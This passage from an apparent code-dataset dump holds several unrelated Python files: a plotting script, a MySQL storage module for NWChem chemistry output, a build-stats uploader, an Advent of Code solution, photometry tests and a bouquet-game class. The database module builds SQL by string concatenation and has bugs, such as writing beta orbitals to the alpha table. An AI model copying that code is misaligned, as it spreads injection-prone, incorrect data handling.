'--', c=color, lw=LW)\nax[1].plot([1.45, 1.45], [1.7, -0.2], '--', c=color, lw=LW)\n\n_ = ax[1].set_xlim(-np.pi, np.pi), ax[1].set_ylim(-np.pi, np.pi)\n_ = ax[1].set_xticks([-np.pi, 0, np.pi]), ax[1].set_yticks([-np.pi, 0, np.pi])\n_ = ax[1].set_xticklabels(['$-\\\\pi$', '$0$', '$\\\\pi$']), ax[1].set_yticklabels(['$-\\\\pi$', '$0$', '$\\\\pi$']), \n_ = ax[1].set_ylabel('$p$')\n_ = ax[1].set_xlabel('$x$')\nprint()\n\n####################\n# --- Fig 5(c) --- #\n####################\n\nms = ms/2\nn = 200\nNtot = int(1e9)\nexponent = np.log10(Ntot)\nbase = int(Ntot/10**exponent)\n\nxi = 1.45\nxf = 2.2\nyi = -0.2\nyf = 1.7\n\ndatafile1a = path + 'fig5b_blue_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1b = path + 'fig5b_red_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile1c = path + 'fig5b_green_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\ndatafile2 = path + 'fig5b_black_Ntot=%ie%i_n=%i.dat' % (base, exponent, n)\n\n# Checks if datafile exists\nif not os.path.isfile(datafile2):\n import sys\n print('%s does not exist!\\nDid you run fig5a.py?\\nStopping execution...' % (datafile2))\n sys.exit()\n\nprint('Extracting data from %s...' % datafile1c)\ndf = pd.read_csv(datafile1c, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color3, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1b)\ndf = pd.read_csv(datafile1b, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color2, markersize=ms)\n\nprint('Extracting data from %s...' % datafile1a)\ndf = pd.read_csv(datafile1a, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c=color1, markersize=ms)\n\nprint('Extracting data from %s...' % datafile2)\ndf = pd.read_csv(datafile2, header=None, delim_whitespace=True)\nx = np.array(df[0])\ny = np.array(df[1])\nX = x[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nY = y[np.where((x >= xi) & (x <= xf) & (y >= yi) & (y <= yf))]\nx = X\ny = Y\nprint('Plotting the data...')\nax[2].plot(x, y, 'x', c='k', markersize=ms)\n\nax[2].text(xbox, ybox, '(c)', transform=ax[2].transAxes, bbox=bbox)\n\n_ = ax[2].set_xlim(xi, xf), ax[2].set_ylim(yi, yf)\n_ = ax[2].set_xticks([xi, xf]), ax[2].set_yticks([yi, yf])\n_ = ax[2].set_xlabel('$x$')\n\nfigname = 'Figures/fig5.png'\nax[0].tick_params(axis='x', which='major', pad=10)\nax[1].tick_params(axis='x', which='major', pad=10)\nax[2].tick_params(axis='x', which='major', pad=10)\n_ = plt.subplots_adjust(left=0.05, bottom=0.18, right=0.98, top=0.966, hspace=0.27, wspace=0.2)\nprint('Saving in %s...' % figname)\nplt.savefig(figname, dpi=250, format='png')\nprint('Done.')\n","repo_name":"mrolims/StickinessRecurrencePlots","sub_path":"plot_fig5.py","file_name":"plot_fig5.py","file_ext":"py","file_size_in_byte":7984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42790729706","text":"from nwchem_parse import nwchem_parser\nfrom nwchem_parse import nw_atom, nw_orbital\nimport mysql.connector\nfrom mysql.connector import Error\nimport re\n\n\"\"\"\nExample run:\n\nfn = Path to NWchem output file\ndb = Name of schema in database (Should be same as prefix ex. La-9+\npw = Your password to the database\nusr = Your username for the database\n\n# Stores data in database\nstore_data = database_storage(fn, usr, pw, db)\n\ndb = Name of schema in database (Should be same as prefix ex. La-9+\npw = Your password to the database\nusr = Your username for the database\n\n# Initializes data retrieval class\nretrieve_data = database_retrieval(db, usr, pw)\n\n# Get all data from schema\nretrieve_data.get_all()\n\"\"\"\n\nclass database_retrieval():\n _runinfo = dict()\n _atom_dict = dict()\n _orbital_dict_alpha = dict()\n _orbital_dict_beta = dict()\n _energies = dict()\n _total_density = dict()\n _spin_density = dict()\n _gradient_dict = dict()\n _overlap_dict = dict()\n connection = 0\n\n # Getters and Setters\n @property\n def energies(self): return self._energies\n @energies.setter\n def energies(self, val): self._energies = val\n\n @property\n def atom_dict(self): return self._atom_dict\n @atom_dict.setter\n def atom_dict(self, val): self._atom_dict = val\n\n @property\n def runinfo(self): return self._runinfo\n\n @runinfo.setter\n def runinfo(self, val): self._runinfo = val\n\n @property\n def orbital_dict_alpha(self): return self._orbital_dict_alpha\n\n @orbital_dict_alpha.setter\n def orbital_dict_alpha(self, val): self._orbital_dict_alpha = val\n\n @property\n def orbital_dict_beta(self): return self._orbital_dict_beta\n\n @orbital_dict_beta.setter\n def orbital_dict_beta(self, val): self._orbital_dict_beta = val\n\n @property\n def total_density(self): return self._total_density\n\n @total_density.setter\n def total_density(self, val): self._total_density = val\n\n @property\n def spin_density(self): return self._spin_density\n\n @spin_density.setter\n def spin_density(self, val): self._spin_density = val\n\n @property\n def gradient_dict(self): return self._gradient_dict\n\n @gradient_dict.setter\n def overlap_dict(self, val): self._gradient_dict = val\n\n @property\n def overlap_dict(self): return self._overlap_dict\n\n @overlap_dict.setter\n def overlap_dict(self, val): self._overlap_dict = val\n\n def __init__(self, db, usr, pwd):\n self.db = db\n self.usr = usr\n self.pwd = pwd\n self.connection = create_db_connection(\"%\", usr, pwd, db)\n\n def get_all(self):\n self._runinfo = self.get_run_info(self.connection)\n self._atom_dict = self.get_geo_info(self.connection)\n self._energies = self.get_energy(self.connection)\n self._total_density = self.get_totalDensity(self.connection)\n self._spin_density = self.get_spinDensity(self.connection)\n self._orbital_dict_alpha = self.get_alphaOrbital_info(self.connection)\n self._orbital_dict_beta = self.get_betaOrbital_info(self.connection)\n self._gradient_dict = dict()\n self._overlap_dict = self.get_overlap_info(self.connection)\n\n def get_run_info(self, connection):\n _runinfo = dict()\n get = \"\"\" SELECT * FROM run_info; \"\"\"\n results = read_query(connection, get)\n _runinfo['prefix'] = results[0][0]\n _runinfo['date'] = results[0][1]\n _runinfo['NW_branch'] = float(results[0][2])\n _runinfo['NW_revision'] = float(results[0][3])\n _runinfo['GA_revision'] = float(results[0][4])\n\n return _runinfo\n\n def get_geo_info(self, connection):\n _atoms = dict()\n get = \"\"\" SELECT * FROM geometry; \"\"\"\n results = read_query(connection, get)\n for at in results:\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]))\n _atoms[new_atom.id] = new_atom\n\n return _atoms\n\n def get_energy(self, connection):\n _energy = dict()\n get = \"\"\" SELECT * FROM initial_energy; \"\"\"\n results = read_query(connection, get)\n\n def get_totalDensity(self, connection):\n _total = dict()\n get = \"\"\" SELECT * FROM total_density_mulliken; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _total['Mulliken Population Analysis'] = data\n\n get = \"\"\" SELECT * FROM total_density_lowdin; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _total['Lowdin Population Analysis'] = data\n\n return _total\n\n def get_spinDensity(self, connection):\n _spin = dict()\n get = \"\"\" SELECT * FROM spin_density_mulliken; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _spin['Mulliken Population Analysis'] = data\n\n get = \"\"\" SELECT * FROM spin_density_lowdin; \"\"\"\n results = read_query(connection, get)\n data = []\n for at in results:\n res = at[3].strip('][').split(' ')\n for i in range(len(res)):\n res[i] = float(res[i])\n new_atom = nw_atom(id=float(at[0]), species=at[1], charge=float(at[2]), shell_charges=res)\n data.append(new_atom)\n\n _spin['Lowdin Population Analysis'] = data\n return _spin\n\n def get_alphaOrbital_info(self, connection):\n alpha = dict()\n get = \"\"\" SELECT * FROM alpha_orbital; \"\"\"\n results = read_query(connection, get)\n for orbital in results:\n basatoms = []\n basefuncs = []\n for w in orbital[3].split(\") \"):\n basisfun = re.split(',\\s', w)\n basisfun[0] = float(basisfun[0].replace(\"(\", \"\"))\n basisfun[1] = float(basisfun[1].replace(\" \", \"\"))\n whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n basisfun[3] = ''.join(filter(whitelist.__contains__, basisfun[3]))\n basisfun[3] = basisfun[3].strip()\n t = re.search(r'\\((.*?)\\)', basisfun[2]).group(1)\n t = t.split(\",\")\n new_atom = nw_atom(float(t[0]), t[1])\n basisfun[2] = new_atom\n basatoms.append(new_atom)\n basefuncs.append(basisfun)\n\n n = nw_orbital(vector=orbital[0], E=float(orbital[1]), occ=float(orbital[7]))\n n.basisatoms = basatoms\n n.basisfuncs = basefuncs\n n.isHOMO = (orbital[5] == 1)\n n.isLUMO = (orbital[6] == 1)\n n.spin = float(orbital[8])\n cent = orbital[4].strip('][').split(' ')\n for i in range(len(cent)):\n cent[i] = float(cent[i])\n n.center = cent\n alpha[n.vector] = n\n return alpha\n\n def get_betaOrbital_info(self, connection):\n beta = dict()\n get = \"\"\" SELECT * FROM alpha_orbital; \"\"\"\n results = read_query(connection, get)\n for orbital in results:\n basatoms = []\n basefuncs = []\n for w in orbital[3].split(\") \"):\n basisfun = re.split(',\\s', w)\n basisfun[0] = float(basisfun[0].replace(\"(\", \"\"))\n basisfun[1] = float(basisfun[1].replace(\" \", \"\"))\n whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n basisfun[3] = ''.join(filter(whitelist.__contains__, basisfun[3]))\n basisfun[3] = basisfun[3].strip()\n t = re.search(r'\\((.*?)\\)', basisfun[2]).group(1)\n t = t.split(\",\")\n new_atom = nw_atom(float(t[0]), t[1])\n basisfun[2] = new_atom\n basatoms.append(new_atom)\n basefuncs.append(basisfun)\n\n n = nw_orbital(vector=orbital[0], E=float(orbital[1]), occ=float(orbital[7]))\n n.basisatoms = basatoms\n n.basisfuncs = basefuncs\n n.isHOMO = (orbital[5] == 1)\n n.isLUMO = (orbital[6] == 1)\n n.spin = float(orbital[8])\n cent = orbital[4].strip('][').split(' ')\n for i in range(len(cent)):\n cent[i] = float(cent[i])\n n.center = cent\n beta[n.vector] = n\n return beta\n\n def get_overlap_info(self, connection):\n get = \"\"\" SELECT * FROM orbital_overlap \"\"\"\n results = read_query(connection, get)\n r = 1\n overlap = dict()\n for i in results:\n entry = dict()\n entry['alpha'] = i[0]\n entry['beta'] = i[1]\n entry['overlap'] = i[2]\n overlap[str(r)] = entry\n r += 1\n return overlap\n\n\n def get_orbital_info(self, connection):\n al = self.get_alphaOrbital_info(connection)\n be = self.get_betaOrbital_info(connection)\n\n return al, be\n\n\nclass database_storage():\n def __init__(self, fn, usr, pwd, db):\n self.usr = usr\n self.pwd = pwd\n self.fn = fn\n self.db = db\n #self.cp = cp\n que = \"\"\" CREATE DATABASE \"\"\" + str(db)\n nw = nwchem_parser(fn)\n server = create_server_connection(\"%\", usr, pwd)\n d = create_database(server, que)\n connection = create_db_connection(\"%\", usr, pwd, db)\n self.runinfo_storage(nw._runinfo, connection)\n self.totalDensity_storage(nw._total_density, connection)\n self.spinDensity_storage(nw._spin_density, connection)\n self.geometry_storage(nw._atom_dict, connection)\n self.alphaOrbital_storage(nw._orbital_dict_alpha, connection)\n self.betaOrbital_storage(nw._orbital_dict_beta, connection)\n self.orbitalOverlap_storage(nw._overlap_dict, connection)\n self.initialEnergy_storage(nw._energies, connection)\n self.gradient_storage(nw._gradient_dict, connection)\n\n def runinfo_storage(self, runinfo, connection):\n create_runinfo_table = \"\"\"\n CREATE TABLE run_info (\n prefix VARCHAR(20) PRIMARY KEY,\n date VARCHAR(30),\n nwchem_branch VARCHAR(20),\n nwchem_revision VARCHAR(20),\n ga_revision VARCHAR(20));\n \"\"\"\n execute_query(connection, create_runinfo_table)\n\n entry = (\n runinfo['prefix'], runinfo['date'], runinfo['NW_branch'], runinfo['NW_revision'], runinfo['GA_revision'])\n pop_entry = \"\"\" INSERT INTO run_info VALUES \"\"\" + str(entry)\n execute_query(connection, pop_entry)\n\n def geometry_storage(self, geoinfo, connection):\n create_geoinfo_table = \"\"\"\n CREATE TABLE geometry (\n atom_id FLOAT,\n species VARCHAR(5),\n charge FLOAT);\n \"\"\"\n execute_query(connection, create_geoinfo_table)\n\n entry = \"\"\" INSERT INTO geometry VALUES \"\"\"\n for ob in geoinfo:\n atom = geoinfo[ob]\n if (atom.id != 1):\n entry += \", \"\n e = (atom.id, atom.species, atom.charge)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def totalDensity_storage(self, totdeninfo, connection):\n create_totdeninfo_table = \"\"\"\n CREATE TABLE total_density_mulliken (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_totdeninfo_table)\n\n entry = \"\"\" INSERT INTO total_density_mulliken VALUES \"\"\"\n for atom in totdeninfo['Mulliken Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n create_totdeninfo_table = \"\"\"\n CREATE TABLE total_density_lowdin (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_totdeninfo_table)\n\n entry = \"\"\" INSERT INTO total_density_lowdin VALUES \"\"\"\n for atom in totdeninfo['Lowdin Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def spinDensity_storage(self, spindeninfo, connection):\n create_spindeninfo_table = \"\"\"\n CREATE TABLE spin_density_mulliken (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_spindeninfo_table)\n\n entry = \"\"\" INSERT INTO spin_density_mulliken VALUES \"\"\"\n for atom in spindeninfo['Mulliken Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n create_spindeninfo_table = \"\"\"\n CREATE TABLE spin_density_lowdin (\n id FLOAT,\n species VARCHAR(5),\n charge FLOAT,\n shell_charges VARCHAR(130));\n \"\"\"\n execute_query(connection, create_spindeninfo_table)\n\n entry = \"\"\" INSERT INTO spin_density_lowdin VALUES \"\"\"\n for atom in spindeninfo['Lowdin Population Analysis']:\n if (atom.id != 1):\n entry += \", \"\n sh_ch = ' '.join(str(e) for e in atom.shell_charges)\n e = (atom.id, atom.species, atom.charge, sh_ch)\n entry += str(e)\n entry += \";\"\n execute_query(connection, entry)\n\n def initialEnergy_storage(self, initialeninfo, connection):\n create_initialeninfo_table = \"\"\"\n CREATE TABLE initial_energy (\n total_energy FLOAT,\n 1e_energy FLOAT,\n 2e_energy FLOAT,\n HOMO FLOAT,\n LUMO FLOAT);\n \"\"\"\n execute_query(connection, create_initialeninfo_table)\n\n entry = (\n initialeninfo['total'], initialeninfo['1e'], initialeninfo['2e'], initialeninfo['HOMO'], initialeninfo['LUMO'])\n pop_entry = \"\"\" INSERT INTO initial_energy VALUES \"\"\" + str(entry) + \";\"\n execute_query(connection, pop_entry)\n\n def alphaOrbital_storage(self, orbitalinfo, connection):\n create_alphaoribital_table = \"\"\"\n CREATE TABLE alpha_orbital (\n vector FLOAT,\n energy FLOAT,\n basisAtom VARCHAR(200),\n basisFuncs VARCHAR(400),\n center VARCHAR(50),\n isHOMO BOOLEAN,\n isLUMO BOOLEAN,\n occupancy FLOAT,\n spin FLOAT);\n \"\"\"\n execute_query(connection, create_alphaoribital_table)\n\n entry = \"\"\" INSERT INTO alpha_orbital VALUES \"\"\"\n for orbit in orbitalinfo:\n if (orbit != 10):\n entry += \", \"\n org = orbitalinfo[orbit]\n basatom = ' '.join(str(i) for i in org.basisatoms)\n basfunc = ' '.join(str(i) for i in org.basisfuncs)\n cente = ' '.join(str(i) for i in org.center)\n e = (org.vector, org.E, basatom, basfunc, cente, org.isHOMO,\n org.isLUMO, org.occ, org.spin)\n entry += str(e)\n entry += \";\"\n\n execute_query(connection, entry)\n\n def betaOrbital_storage(self, orbitalinfo, connection):\n create_betaoribital_table = \"\"\"\n CREATE TABLE beta_orbital (\n vector FLOAT,\n energy FLOAT,\n basisAtom VARCHAR(200),\n basisFuncs VARCHAR(400),\n center VARCHAR(50),\n isHOMO BOOLEAN,\n isLUMO BOOLEAN,\n occupancy FLOAT,\n spin FLOAT);\n \"\"\"\n execute_query(connection, create_betaoribital_table)\n\n entry = \"\"\" INSERT INTO alpha_orbital VALUES \"\"\"\n for orbit in orbitalinfo:\n if (orbit != 10):\n entry += \", \"\n org = orbitalinfo[orbit]\n basatom = ' '.join(str(i) for i in org.basisatoms)\n basfunc = ' '.join(str(i) for i in org.basisfuncs)\n cente = ' '.join(str(i) for i in org.center)\n e = (org.vector, org.E, basatom, basfunc, cente, org.isHOMO,\n org.isLUMO, org.occ, org.spin)\n entry += str(e)\n entry += \";\"\n\n execute_query(connection, entry)\n\n def orbitalOverlap_storage(self, overlapinfo, connection):\n create_overlap_table = \"\"\"\n CREATE TABLE orbital_overlap (\n alpha FLOAT,\n beta FLOAT,\n overlap FLOAT);\n \"\"\"\n execute_query(connection, create_overlap_table)\n\n entry = \"\"\" INSERT INTO orbital_overlap VALUES \"\"\"\n for en in overlapinfo:\n thing = overlapinfo[en]\n entry += str((thing['alpha'], thing['beta'], thing['overlap']))\n if(float(en) < len(overlapinfo)):\n entry += \", \"\n entry += \";\"\n execute_query(connection, entry)\n\n def gradient_storage(self, grad_info, connection):\n create_gradient_table = \"\"\"\n CREATE TABLE gradient (\n )\n \"\"\"\n print(2)\n\n\ndef read_query(connection, query):\n cursor = connection.cursor()\n result = None\n try:\n cursor.execute(query)\n result = cursor.fetchall()\n return result\n except Error as err:\n print(f\"Error: '{err}'\")\n\ndef create_server_connection(host_name, user_name, user_password):\n connection = None\n try:\n connection = mysql.connector.connect(\n host=host_name,\n user=user_name,\n passwd=user_password\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n return connection\n\ndef create_database(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n print(\"Database created successfully\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n\ndef create_db_connection(host_name, user_name, user_password, db_name):\n connection = None\n try:\n connection = mysql.connector.connect(\n host=host_name,\n user=user_name,\n passwd=user_password,\n database=db_name\n )\n print(\"MySQL Database connection successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n\n return connection\n\ndef execute_query(connection, query):\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print(\"Query successful\")\n except Error as err:\n print(f\"Error: '{err}'\")\n","repo_name":"WiresinaBox/dft-seperation","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":19636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22682597720","text":"import logging\nimport re\nimport sys\n\nfrom chromite.buildbot import constants\nfrom chromite.lib import commandline\nfrom chromite.lib import cros_build_lib\nfrom chromite.lib import stats\n\n\nFILE_LOAD_ERROR = 'Error loading %s'\nUNCAUGHT_ERROR = 'Uncaught command stats exception.'\n\n\nclass LoadError(RuntimeError):\n \"\"\"Error during loading of stats file.\"\"\"\n\n\nclass StatsLoader(object):\n \"\"\"Loads stats from a file.\"\"\"\n\n @classmethod\n def LoadFile(cls, stat_file):\n \"\"\"Return a Stats object constructed from contents of |stat_file|.\"\"\"\n\n with open(stat_file, 'r') as f:\n first_line = f.readline().rstrip()\n match = re.match(r'Chromium OS .+ Version (\\d+)$', first_line)\n if not match:\n raise LoadError('Stats file not in expected format')\n\n version = int(match.group(1))\n loader = cls._GetLinesLoader(version)\n if not loader:\n raise LoadError('Stats file version %s not supported.' % version)\n\n return loader(f.readlines())\n\n @classmethod\n def _GetLinesLoader(cls, version):\n LOADERS = (\n None,\n cls._LoadLinesV1, # Version 1 loader (at index 1)\n )\n\n if version < len(LOADERS) and version >= 0:\n return LOADERS[version]\n\n return None\n\n @classmethod\n def _LoadLinesV1(cls, stat_lines):\n \"\"\"Load stat lines in Version 1 format.\"\"\"\n data = {}\n for line in stat_lines:\n # Each line has following format:\n # attribute_name Rest of line is value for attribute_name\n # Note that some attributes may have no value after their name.\n attr, _sep, value = line.rstrip().partition(' ')\n if not attr:\n attr = line.rstrip()\n\n data[attr] = value\n\n return stats.Stats(**data)\n\n\ndef main(argv):\n \"\"\"Main function.\"\"\"\n # This is not meant to be a user-friendly script. It takes one and\n # only one argument, which is a build stats file to be uploaded\n epilog = (\n 'This script is not intended to be run manually. It is used as'\n ' part of the build command statistics project.'\n )\n in_golo = cros_build_lib.GetHostDomain().endswith(constants.GOLO_DOMAIN)\n debug_level = commandline.ArgumentParser.DEFAULT_LOG_LEVEL\n if in_golo:\n debug_level = 'debug'\n parser = commandline.ArgumentParser(\n epilog=epilog, default_log_level=debug_level)\n parser.add_argument(\n 'build_stats_file', nargs=1, default=None)\n options = parser.parse_args(argv)\n\n try:\n cmd_stats = StatsLoader.LoadFile(options.build_stats_file[0])\n except LoadError:\n logging.error(FILE_LOAD_ERROR, options.build_stats_file[0],\n exc_info=True)\n sys.exit(1)\n\n try:\n stats.StatsUploader.Upload(cmd_stats)\n except Exception:\n logging.error(UNCAUGHT_ERROR, exc_info=True)\n sys.exit(1)\n","repo_name":"espadrine/opera","sub_path":"chromium/src/third_party/chromite/scripts/upload_command_stats.py","file_name":"upload_command_stats.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"71728439186","text":"\ndef read_input(file_name):\n file = open(file_name, 'r')\n depart_time = int(file.readline().strip())\n id_string = file.readline().strip().split(',')\n bus_ids = []\n for r_id in id_string:\n bus_ids.append(r_id)\n return depart_time, bus_ids\n\n\ndef part1(latest_depart, buses):\n min_bus = (0, 1000000000)\n for b_id in buses:\n if b_id == 'x':\n continue\n b_id = int(b_id)\n time_to_next_depart = b_id * ((latest_depart // b_id) + 1) - latest_depart\n if min_bus[1] > time_to_next_depart:\n min_bus = (b_id, time_to_next_depart)\n return min_bus[0] * min_bus[1]\n\n\ndef slow_part2(buses):\n first_id = int(buses[0])\n counter = first_id\n while True:\n w_count = counter + 1\n for i in range(1, len(buses)):\n if buses[i] == 'x':\n w_count += 1\n elif w_count % int(buses[i]) == 0:\n w_count += 1\n if i == len(buses) - 1:\n return counter\n else:\n break\n counter += first_id\n\n\ndef part2(buses):\n time = 0\n step = 1\n p2 = [(int(i), j) for j, i in enumerate(buses) if i != 'x']\n for bus_id, minutes in p2:\n while(time + minutes) % bus_id != 0:\n time += step\n step *= bus_id\n return time\n\n\ndef main():\n file_name = \"Part1Input.txt\"\n depart_time, bus_ids = read_input(file_name)\n print(part1(depart_time, bus_ids))\n print(part2(bus_ids))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ZacharyRJohnson/Advent-of-Code","sub_path":"2020/Day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16928647224","text":"import numpy as np\nimport tgk.core\ntgk.core.configure()\n\nclass TestCometPhot:\n def test_centroid(self):\n import os\n from tgk import minions, core\n from tgk.science import Science\n\n frame = 'elp1m008-fl05-20170329-0170'\n fn = os.path.join(core.config['download path'],\n 'e91', '20170330',\n 'elp1m008-fl05-20170329-0170-e91.fits.fz')\n im, obs = Science.get_frame_data(frame, fn)\n geom = Science.get_geometry(frame, obs)\n\n m = minions.CometPhot(core.config, im, obs, geom)\n yxc, sep = m.centroid()\n \n yx0 = np.array([2222.7, 2103.0])\n d = np.sqrt(np.sum((yxc - yx0)**2))\n assert d < 0.5\n\n def test_photometry(self):\n import os\n from tgk import minions, core\n from tgk.science import Science\n\n frame = 'elp1m008-fl05-20170329-0170'\n fn = os.path.join(core.config['download path'],\n 'e91', '20170330',\n 'elp1m008-fl05-20170329-0170-e91.fits.fz')\n im, obs = Science.get_frame_data(frame, fn)\n geom = Science.get_geometry(frame, obs)\n\n im._hdu['sci'].data = 2 * np.ones_like(im.data)\n \n m = minions.CometPhot(core.config, im, obs, geom)\n bg = dict(bg=0, bgsig=0.5, bgarea=1000)\n area, flux, ferr = m.apphot([100, 100], 6, bg)\n \n assert np.isclose(area, 109)\n assert np.isclose(flux, 109 * 2 / obs.exptime.value)\n assert np.isclose(ferr, 15.75500714058867 / obs.exptime.value)\n","repo_name":"mkelley/41P-LCO","sub_path":"tests/minions/test_cometphot.py","file_name":"test_cometphot.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70217857747","text":"from collections import Counter\nfrom typing import Dict\n\nimport numpy as np\n\nfrom constants import MAX_BOUQUET_SIZE\nfrom flowers import Bouquet, Flower, FlowerSizes, FlowerColors, FlowerTypes\nfrom utils import flatten_counter\nfrom suitors.base import BaseSuitor\n\n\nclass RandomSuitor(BaseSuitor):\n def __init__(self, days: int, num_suitors: int, suitor_id: int):\n \"\"\"\n :param days: number of days of courtship\n :param num_suitors: number of suitors, including yourself\n :param suitor_id: unique id of your suitor in range(num_suitors)\n \"\"\"\n super().__init__(days, num_suitors, suitor_id, name='rand')\n\n def _prepare_bouquet(self, remaining_flowers, recipient_id):\n num_remaining = sum(remaining_flowers.values())\n size = int(np.random.randint(0, min(MAX_BOUQUET_SIZE, num_remaining) + 1))\n if size > 0:\n chosen_flowers = np.random.choice(flatten_counter(remaining_flowers), size=(size, ), replace=False)\n chosen_flower_counts = dict(Counter(chosen_flowers))\n for k, v in chosen_flower_counts.items():\n remaining_flowers[k] -= v\n assert remaining_flowers[k] >= 0\n else:\n chosen_flower_counts = dict()\n chosen_bouquet = Bouquet(chosen_flower_counts)\n return self.suitor_id, recipient_id, chosen_bouquet\n\n def prepare_bouquets(self, flower_counts: Dict[Flower, int]):\n \"\"\"\n :param flower_counts: flowers and associated counts for for available flowers\n :return: list of tuples of (self.suitor_id, recipient_id, chosen_bouquet)\n the list should be of length len(self.num_suitors) - 1 because you should give a bouquet to everyone\n but yourself\n\n To get the list of suitor ids not including yourself, use the following snippet:\n\n all_ids = np.arange(self.num_suitors)\n recipient_ids = all_ids[all_ids != self.suitor_id]\n \"\"\"\n all_ids = np.arange(self.num_suitors)\n recipient_ids = all_ids[all_ids != self.suitor_id]\n remaining_flowers = flower_counts.copy()\n return list(map(lambda recipient_id: self._prepare_bouquet(remaining_flowers, recipient_id), recipient_ids))\n\n def zero_score_bouquet(self):\n \"\"\"\n :return: a Bouquet for which your scoring function will return 0\n \"\"\"\n min_flower = Flower(\n size=FlowerSizes.Small,\n color=FlowerColors.White,\n type=FlowerTypes.Rose\n )\n return Bouquet({min_flower: 1})\n\n def one_score_bouquet(self):\n \"\"\"\n :return: a Bouquet for which your scoring function will return 1\n \"\"\"\n max_flower = Flower(\n size=FlowerSizes.Large,\n color=FlowerColors.Blue,\n type=FlowerTypes.Begonia\n )\n return Bouquet({max_flower: 1})\n\n def score_types(self, types: Dict[FlowerTypes, int]):\n \"\"\"\n :param types: dictionary of flower types and their associated counts in the bouquet\n :return: A score representing preference of the flower types in the bouquet\n \"\"\"\n if len(types) == 0:\n return 0.0\n\n avg_types = float(np.mean([x.value for x in flatten_counter(types)]))\n return avg_types / (3 * (len(FlowerTypes) - 1))\n\n def score_colors(self, colors: Dict[FlowerColors, int]):\n \"\"\"\n :param colors: dictionary of flower colors and their associated counts in the bouquet\n :return: A score representing preference of the flower colors in the bouquet\n \"\"\"\n if len(colors) == 0:\n return 0.0\n\n avg_colors = float(np.mean([x.value for x in flatten_counter(colors)]))\n return avg_colors / (3 * (len(FlowerColors) - 1))\n\n def score_sizes(self, sizes: Dict[FlowerSizes, int]):\n \"\"\"\n :param sizes: dictionary of flower sizes and their associated counts in the bouquet\n :return: A score representing preference of the flower 